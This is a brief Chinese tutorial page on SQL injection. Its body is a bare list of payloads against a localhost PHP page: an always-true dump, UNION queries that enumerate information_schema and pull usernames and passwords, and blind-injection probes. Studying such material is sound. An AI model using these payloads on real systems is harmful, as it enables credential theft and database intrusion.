Java教程

SQL注入

本文主要是介绍SQL注入,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users

//查询所有数据
http://localhost/index.php?id=0 or 1=1

--UNION注入破解用户名密码
select TABLE_SCHEMA FROM information_  schema.TABLES //数据库名称

//猜测表名
http://localhost/index.php?id=33  UNION select 1,TABLE_NAME,3,4  FROM information_schema.TABLES where  TABLE_SCHEMA='jokedb'

//猜测字段名
select column_name from information_schema.columns where TABLE_SCHEMA='jokedb' and TABLE_NAME='users';
//查询用户名密码
http://localhost/index.php?id=33 UNION SELECT 1,user,pass,4 from jokedb.users

//盲注函数
select if(1=1,'tiger','monkey')
//猜表名是否存在
SELECT * FROM region WHERE (id = 33) and 1<(select count(*) from jokedb.xss ) 

这篇关于SQL注入的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!